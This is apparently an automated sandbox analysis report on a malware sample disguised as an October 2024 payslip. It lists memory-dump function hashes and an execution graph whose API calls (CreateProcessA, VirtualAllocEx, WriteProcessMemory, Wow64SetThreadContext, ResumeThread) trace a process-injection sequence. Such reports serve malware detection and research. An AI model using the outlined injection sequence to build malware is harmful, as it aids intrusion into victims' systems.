                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0833ba86cece320e2eade9400c9c14b86f7f5352355ff11ffc348368aaaad09b
                                                                                                            • Instruction ID: 86336326f630fc1c0fd4dfa2735d58ee31ed947c8f09570d9938da1f346ddb9b
                                                                                                            • Opcode Fuzzy Hash: 0833ba86cece320e2eade9400c9c14b86f7f5352355ff11ffc348368aaaad09b
                                                                                                            • Instruction Fuzzy Hash: 17018635B014251BDB65967DD450B6E73DBEBCA710F14883AE10AC7340EA25DC0347C6
                                                                                                            Function 04FB3104 Relevance: .0, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9aa25a6c33085fb9c71ffc12e2ec26de662c455bcc2e2800575f3c04e7cae43c
                                                                                                            • Instruction ID: 3c3f1db53014e0d3898dc602ca5bae785d27e35ee8c2a5890a07cab1bb9a044c
                                                                                                            • Opcode Fuzzy Hash: 9aa25a6c33085fb9c71ffc12e2ec26de662c455bcc2e2800575f3c04e7cae43c
                                                                                                            • Instruction Fuzzy Hash: 640180F0750710DBD22A8B6AE484962BBE5FB86704B00890DE886C7615DB71FC12DB94
                                                                                                            Function 0662A428 Relevance: .0, Instructions: 46COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bc30b7bbfc5d19d72f8d1b5b7a96915bdaa0d925165a1aeb4104df09db587f08
                                                                                                            • Instruction ID: 837640e77e36a1ce2fa8fe8fa57b0450464bc07074146141d76428f436068b15
                                                                                                            • Opcode Fuzzy Hash: bc30b7bbfc5d19d72f8d1b5b7a96915bdaa0d925165a1aeb4104df09db587f08
                                                                                                            • Instruction Fuzzy Hash: 4301A430B105250FDB64EABCD85472BB7D6DB89714F148839F10EC7355EE61DC428B85
                                                                                                            Function 04FB1BB8 Relevance: .0, Instructions: 43COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0653010c838505372360f585f0d9b892312f220079b592e2c00c00aef4b8c214
                                                                                                            • Instruction ID: cafbd1ab0005789f5e2a9b4c95abd7142deb5ce541a835bf83921fe51b5aacc9
                                                                                                            • Opcode Fuzzy Hash: 0653010c838505372360f585f0d9b892312f220079b592e2c00c00aef4b8c214
                                                                                                            • Instruction Fuzzy Hash: A3014474E1020A8FDB00DBA2D9A1AEEB7B6AF89244F104424C441B7254DF746D07CBA5
                                                                                                            Function 0662C900 Relevance: .0, Instructions: 43COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f197dbad9a728a094571b132a83b5331f9377aaa95733cd932acd3a3db0cfc1d
                                                                                                            • Instruction ID: 55771717ce85b009d19dc02277dc74424c1a0ebb62568ba45036c12d23bcee86
                                                                                                            • Opcode Fuzzy Hash: f197dbad9a728a094571b132a83b5331f9377aaa95733cd932acd3a3db0cfc1d
                                                                                                            • Instruction Fuzzy Hash: 9E012831F112349BCB98AA69E940A9DB776FB85354F10443AE805EB345EB31E815CBC0
                                                                                                            Function 04FB1041 Relevance: .0, Instructions: 42COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 47bfe4f51791139d896bdf183afce6f561ccf4b2882416de53cd6f74e054073d
                                                                                                            • Instruction ID: c6c9fbc63999a110585438f10ede4e1a50e09890a127b520ee51130e6d40b9e8
                                                                                                            • Opcode Fuzzy Hash: 47bfe4f51791139d896bdf183afce6f561ccf4b2882416de53cd6f74e054073d
                                                                                                            • Instruction Fuzzy Hash: 48F06872A051087FDB15DF5ADC41CEFBBBAEBC6254705C1A6E448D7216EA3099068B90
                                                                                                            Function 04FB1A88 Relevance: .0, Instructions: 39COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e28fb81237dcecd03648c802c1f297725574c4d1c3b946cde060b2a42e6e3906
                                                                                                            • Instruction ID: 593c64afa18aba9136cb0f2d07c67860d674d1b046b29a3a634e6a89dc24832e
                                                                                                            • Opcode Fuzzy Hash: e28fb81237dcecd03648c802c1f297725574c4d1c3b946cde060b2a42e6e3906
                                                                                                            • Instruction Fuzzy Hash: 46F04671D062885FCF20DFEADAD48DEBFB6EB02340F14497AE445C3102D260A806C741
                                                                                                            Function 04FB3E88 Relevance: .0, Instructions: 27COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a5678e829b3d05fbc3db49de310feecfaf07eb821642f2c72e978af1ae0eeeaf
                                                                                                            • Instruction ID: dfe2ae5928c80922977ed72c02b7cfba29f643874b307a40e31b85e36c831c21
                                                                                                            • Opcode Fuzzy Hash: a5678e829b3d05fbc3db49de310feecfaf07eb821642f2c72e978af1ae0eeeaf
                                                                                                            • Instruction Fuzzy Hash: B6F0C075E00714AF8B34DFA9D80489EBBF9FF49710B40896EE95593600D771E918CB91
                                                                                                            Function 04FB11C0 Relevance: .0, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 002bbde3785d1ac6011f51103f8ce6c5139cf11e5139b01e8802e44f23b2ca9d
                                                                                                            • Instruction ID: a0987bd787ca236de8fb2f2045e8d645a973b97709c7a63fe52ad8f048d490af
                                                                                                            • Opcode Fuzzy Hash: 002bbde3785d1ac6011f51103f8ce6c5139cf11e5139b01e8802e44f23b2ca9d
                                                                                                            • Instruction Fuzzy Hash: FDF0EDF1906209EFC700EBB0E95258C7FB2EB80308710469AE80AC3A06EA351E169B51
                                                                                                            Function 06626580 Relevance: .0, Instructions: 24COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 86ef6f1ddaaee19f7ab9c869cc0ed6975f9360878b1c2c3743c67d05ac0be5ad
                                                                                                            • Instruction ID: 3f77fced4576ef6735096bff4ed3e25be5592edc6cff3d02756823901b86071d
                                                                                                            • Opcode Fuzzy Hash: 86ef6f1ddaaee19f7ab9c869cc0ed6975f9360878b1c2c3743c67d05ac0be5ad
                                                                                                            • Instruction Fuzzy Hash: 1CE0D8B1D155155FDF50CFB0CA1939A77A4AB42304F2088E6C804DB24AE136CE028B81
                                                                                                            Function 04FB3C00 Relevance: .0, Instructions: 20COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 575895b6da206bc8a9ff0a4b945ef170d469cf35208457fe518a93aa27d96846
                                                                                                            • Instruction ID: 01b79f427ca9a94fb3e8e74e15f9cf190579a8032240c5ccf7eb43fea71225ff
                                                                                                            • Opcode Fuzzy Hash: 575895b6da206bc8a9ff0a4b945ef170d469cf35208457fe518a93aa27d96846
                                                                                                            • Instruction Fuzzy Hash: 78D023522992900BD70763B43C520EC7F4CCF43134B0640A7C14C87243CC404D1343C6
                                                                                                            Function 04FB11D0 Relevance: .0, Instructions: 19COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 077cae1c524ba612ec171ac4c5e12f383a5690a3a4052af37dfac3db7e05be93
                                                                                                            • Instruction ID: 3e33e7d7888a4687435d0a7cf0d1bd3bbd175d7cb8c63cf80979d5f6151d2f1f
                                                                                                            • Opcode Fuzzy Hash: 077cae1c524ba612ec171ac4c5e12f383a5690a3a4052af37dfac3db7e05be93
                                                                                                            • Instruction Fuzzy Hash: 20E04FB0901219EFC700EFA4E65145C7BF5FB44305B104695E806D3704EA312E109B51
                                                                                                            Function 04FB2540 Relevance: .0, Instructions: 16COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 389e6a432a9304965d7c23b982a61661f80998afe0e72d737ee99781993eb251
                                                                                                            • Instruction ID: 9af2f382fe855d8ee0b5cd23c6e2ddf13f8f4baf6f07413acdb78507750a4584
                                                                                                            • Opcode Fuzzy Hash: 389e6a432a9304965d7c23b982a61661f80998afe0e72d737ee99781993eb251
                                                                                                            • Instruction Fuzzy Hash: 56D0923210021DBB8F01AE85EC01DDB3B2AEF897A0B148115FE1417221C672ED72EBE0
                                                                                                            Function 04FB3C10 Relevance: .0, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8138ff074bde4d4a1f9fa436c508952db0abea2bbcccc8e554cfba1d154d11c0
                                                                                                            • Instruction ID: d8b820ec5027c050379cfff171647d3f3bf3aa083fd2d66b47199e5f73571fbd
                                                                                                            • Opcode Fuzzy Hash: 8138ff074bde4d4a1f9fa436c508952db0abea2bbcccc8e554cfba1d154d11c0
                                                                                                            • Instruction Fuzzy Hash: 82B09B2175413513DA08719D68105FD768D87C6569F000067D50D977418CC59C4206DE
                                                                                                            Function 04FB2E57 Relevance: .0, Instructions: 11COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 00c8ce819f82b47c44c9e6ee6d4e45b3c890e53d64a1846a492ef54ae1cfc0e1
                                                                                                            • Instruction ID: 6263ee445201527edbeae3952382a56740deeb112707b4240b9e114e71a973bf
                                                                                                            • Opcode Fuzzy Hash: 00c8ce819f82b47c44c9e6ee6d4e45b3c890e53d64a1846a492ef54ae1cfc0e1
                                                                                                            • Instruction Fuzzy Hash: CDC08C30700A208B8B21AF26A9140ECB3B0BB4A660300090AE09A83640CB26EA0287C4
                                                                                                            Function 04FB278B Relevance: .0, Instructions: 11COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 28055e46df8fc0693f1a8db027fde8ddb206961f27274c2ac5149e1c7faf4707
                                                                                                            • Instruction ID: 0254700a7e931c447e1f6f1aebbcd63ebde37bec38599c18ec1a5c8729832447
                                                                                                            • Opcode Fuzzy Hash: 28055e46df8fc0693f1a8db027fde8ddb206961f27274c2ac5149e1c7faf4707
                                                                                                            • Instruction Fuzzy Hash: DCD0927494421ACBEB209F92C82CBEEBB70BB05315F214459D541A6190CBBD1546CF95
                                                                                                            Function 04FB0F20 Relevance: .0, Instructions: 9COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c21d213c9165ae76d49fd3c63fb108ae724792357349eeaebb634f5e9ffdea12
                                                                                                            • Instruction ID: 4222cd9d4550cb62c28293040772ea2291ea4d380e3b521f61bcd186ead2e81b
                                                                                                            • Opcode Fuzzy Hash: c21d213c9165ae76d49fd3c63fb108ae724792357349eeaebb634f5e9ffdea12
                                                                                                            • Instruction Fuzzy Hash: 18C012B04502008ADF189F1898481113F90EB92329B301A8D9058491C1D772D943D7C1
                                                                                                            Function 04FB2E35 Relevance: .0, Instructions: 2COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2287772bc6c92d15fff9c5f95b3718fb8453e5d1cca9132dbd8a5f5e29b5394f
                                                                                                            • Instruction ID: e3b1fbdac4e722e77261b8f7111c4a90f0e8f0945445c8d549c7f2673cf82b05
                                                                                                            • Opcode Fuzzy Hash: 2287772bc6c92d15fff9c5f95b3718fb8453e5d1cca9132dbd8a5f5e29b5394f
                                                                                                            • Instruction Fuzzy Hash:

                                                                                                            Non-executed Functions

                                                                                                            Function 066277B0 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2222239885
                                                                                                            • Opcode ID: 286612679a87b9958126d8c9f632e64d218967518d295db2758d8807aa44bd34
                                                                                                            • Instruction ID: a8c688482b043e7c0baf81ea73a352e87547c77f14cde5f2dd9146e6211f83a8
                                                                                                            • Opcode Fuzzy Hash: 286612679a87b9958126d8c9f632e64d218967518d295db2758d8807aa44bd34
                                                                                                            • Instruction Fuzzy Hash: D7120D30E0062ACFDB64DF65C854AADBBF2BF89305F208969D40AAB355DB309D45CF91
                                                                                                            Function 0662AA48 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-3823777903
                                                                                                            • Opcode ID: 05004e10cbf2b0b2dceb7179af450ea11c4382a99b9786de437bb4909c38ba8a
                                                                                                            • Instruction ID: 9052d200ca86985b548e9a26043db36005a68710e5add15e723ec9cd931f4530
                                                                                                            • Opcode Fuzzy Hash: 05004e10cbf2b0b2dceb7179af450ea11c4382a99b9786de437bb4909c38ba8a
                                                                                                            • Instruction Fuzzy Hash: B9918E70E0061ADFDB68EFA4D954BAEB7F2AF84701F108829E4059B355DBB49C45CF90
                                                                                                            Function 066271B0 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-390881366
                                                                                                            • Opcode ID: c1fe8f0c3cfe49f07e61d4718175de4d3be6d83ca8d29ad0621eaa7426b0fd49
                                                                                                            • Instruction ID: 32890d3b3dd528c667cecd5970da9eca70630e9c015ef8630d494cd9764583b3
                                                                                                            • Opcode Fuzzy Hash: c1fe8f0c3cfe49f07e61d4718175de4d3be6d83ca8d29ad0621eaa7426b0fd49
                                                                                                            • Instruction Fuzzy Hash: 9CF14C30A01219CFDB58EF65D494B6EBBB2FF84305F248569D40A9B359DB35AC82CF81
                                                                                                            Function 066284E8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2125118731
                                                                                                            • Opcode ID: 38c06a2a903016e8f7fd9feff2aa463ed4c59e1778d2294dab567e8163019128
                                                                                                            • Instruction ID: 03288607d741aa1e202a150ae4b828befa1eb31e357e0fac300719f43eebc479
                                                                                                            • Opcode Fuzzy Hash: 38c06a2a903016e8f7fd9feff2aa463ed4c59e1778d2294dab567e8163019128
                                                                                                            • Instruction Fuzzy Hash: BDB13A30E106299BDB54EB68D89466EB7F2FF84301F24C829D40ADB355DB74EC86CB81
                                                                                                            Function 06628900 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LR^q$LR^q$$^q$$^q
                                                                                                            • API String ID: 0-2454687669
                                                                                                            • Opcode ID: e6e61f1c3a29db435be8e29d339b186fcf0c44ff778b0ebf1a0b53293327623a
                                                                                                            • Instruction ID: 1f361e4225013240ab8ca7ee43696c36c87ddc34b4c179e6b7afc3b7368acce1
                                                                                                            • Opcode Fuzzy Hash: e6e61f1c3a29db435be8e29d339b186fcf0c44ff778b0ebf1a0b53293327623a
                                                                                                            • Instruction Fuzzy Hash: 6551C130B006168FDB58EB28C954B6AB7E6FF88305F14896DE4069F395EA30EC55CB91
                                                                                                            Function 0662ADD6 Relevance: 5.2, Strings: 4, Instructions: 158COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2125118731
                                                                                                            • Opcode ID: a6c0b5b5403f7f431d73ddecd98bff5970877a3cfb745d63c1b7bc8f9ee79b55
                                                                                                            • Instruction ID: ac5591e3798bd7cc0816ac0f801c09f2747fbe452ddab3d022192a2383622e93
                                                                                                            • Opcode Fuzzy Hash: a6c0b5b5403f7f431d73ddecd98bff5970877a3cfb745d63c1b7bc8f9ee79b55
                                                                                                            • Instruction Fuzzy Hash: C751B270E10616CFCF65EBA4D58466EB3B2EB84301F14892AE40ADB345DB74DC42CF81

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:10.8%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:196
                                                                                                            Total number of Limit Nodes:15
                                                                                                            execution_graph 28693 7015570 28694 70156fb 28693->28694 28695 7015596 28693->28695 28695->28694 28699 7015801 PostMessageW 28695->28699 28701 70157e8 PostMessageW 28695->28701 28703 70157f0 PostMessageW 28695->28703 28700 701585c 28699->28700 28700->28695 28702 701585c 28701->28702 28702->28695 28704 701585c 28703->28704 28704->28695 28705 7013a33 28709 7014258 28705->28709 28727 7014268 28705->28727 28706 7013a42 28710 7014282 28709->28710 28721 70142a6 28710->28721 28745 7014845 28710->28745 28749 7014cfe 28710->28749 28754 701465e 28710->28754 28758 70146dc 28710->28758 28763 7014a1d 28710->28763 28768 70146b8 28710->28768 28773 7014e96 28710->28773 28778 70149d0 28710->28778 28782 7014aee 28710->28782 28787 7014dee 28710->28787 28793 701478e 28710->28793 28798 7014d8f 28710->28798 28803 7014b2d 28710->28803 28808 7014929 28710->28808 28813 7014704 28710->28813 28721->28706 28728 7014282 28727->28728 28729 7014845 2 API calls 28728->28729 28730 7014704 2 API calls 28728->28730 28731 7014929 2 API calls 28728->28731 28732 7014b2d 2 API calls 28728->28732 28733 7014d8f 2 API calls 28728->28733 28734 701478e 2 API calls 28728->28734 28735 7014dee 2 API calls 28728->28735 28736 7014aee 2 API calls 28728->28736 28737 70149d0 2 API calls 28728->28737 28738 70142a6 28728->28738 28739 7014e96 2 API calls 28728->28739 28740 70146b8 2 API calls 28728->28740 28741 7014a1d 2 API calls 28728->28741 28742 70146dc 2 API calls 28728->28742 28743 701465e 2 API calls 28728->28743 28744 7014cfe 2 API calls 28728->28744 28729->28738 28730->28738 28731->28738 28732->28738 28733->28738 28734->28738 28735->28738 28736->28738 28737->28738 28738->28706 28739->28738 28740->28738 28741->28738 28742->28738 28743->28738 28744->28738 28746 70147f2 28745->28746 28818 7013330 28745->28818 28822 7013328 28745->28822 28746->28721 28746->28746 28751 7014a3b 28749->28751 28750 7015068 28750->28721 28751->28749 28751->28750 28826 7013240 28751->28826 28830 7013238 28751->28830 28834 70134c8 28754->28834 28838 70134bc 28754->28838 28759 70146ee 28758->28759 28842 7013180 28759->28842 28846 7013178 28759->28846 28760 7014fe8 28764 7014a23 28763->28764 28765 7015068 28764->28765 28766 7013240 WriteProcessMemory 28764->28766 28767 7013238 WriteProcessMemory 28764->28767 28765->28721 28766->28764 28767->28764 28769 70146c4 28768->28769 28770 7014c37 28769->28770 28771 7013240 WriteProcessMemory 28769->28771 28772 7013238 WriteProcessMemory 28769->28772 28770->28721 28771->28769 28772->28769 28774 70146c4 28773->28774 28775 7014c37 28774->28775 28776 7013240 WriteProcessMemory 28774->28776 28777 7013238 WriteProcessMemory 28774->28777 28775->28721 28776->28774 28777->28774 28850 70130a1 28778->28850 28854 70130a8 28778->28854 28779 70149ea 28783 7014b03 28782->28783 28784 7014b5e 28783->28784 28858 70154f0 28783->28858 28863 70154e3 28783->28863 28788 7014df1 28787->28788 28789 7014dab 28787->28789 28791 70130a1 Wow64SetThreadContext 28789->28791 28792 70130a8 Wow64SetThreadContext 28789->28792 28790 7014db9 28791->28790 28792->28790 28794 7014f87 28793->28794 28796 7013240 WriteProcessMemory 28794->28796 28797 7013238 WriteProcessMemory 28794->28797 28795 7014fab 28796->28795 28797->28795 28799 7014d9e 28798->28799 28801 70130a1 Wow64SetThreadContext 28799->28801 28802 70130a8 Wow64SetThreadContext 28799->28802 28800 7014db9 28801->28800 28802->28800 28804 7014b33 28803->28804 28806 70154f0 2 API calls 28804->28806 28807 70154e3 2 API calls 28804->28807 28805 7014b5e 28806->28805 28807->28805 28809 701484e 28808->28809 28811 7013330 ReadProcessMemory 28809->28811 28812 7013328 ReadProcessMemory 28809->28812 28810 70147f2 28810->28721 28810->28810 28811->28810 28812->28810 28816 7013240 WriteProcessMemory 28813->28816 28817 7013238 WriteProcessMemory 28813->28817 28814 70146c4 28814->28813 28815 7014c37 28814->28815 28815->28721 28816->28814 28817->28814 28819 701337b ReadProcessMemory 28818->28819 28821 70133bf 28819->28821 28821->28746 28823 701337b ReadProcessMemory 28822->28823 28825 70133bf 28823->28825 28825->28746 28827 7013288 WriteProcessMemory 28826->28827 28829 70132df 28827->28829 28829->28751 28831 7013288 WriteProcessMemory 28830->28831 28833 70132df 28831->28833 28833->28751 28835 7013551 CreateProcessA 28834->28835 28837 7013713 28835->28837 28837->28837 28839 70134c8 CreateProcessA 28838->28839 28841 7013713 28839->28841 28841->28841 28843 70131c0 VirtualAllocEx 28842->28843 28845 70131fd 28843->28845 28845->28760 28847 70131c0 VirtualAllocEx 28846->28847 28849 70131fd 28847->28849 28849->28760 28851 70130a8 Wow64SetThreadContext 28850->28851 28853 7013135 28851->28853 28853->28779 28855 70130ed Wow64SetThreadContext 28854->28855 28857 7013135 28855->28857 28857->28779 28859 7015505 28858->28859 28868 7012ff0 28859->28868 28872 7012ff8 28859->28872 28860 7015518 28860->28784 28864 7015505 28863->28864 28866 7012ff0 ResumeThread 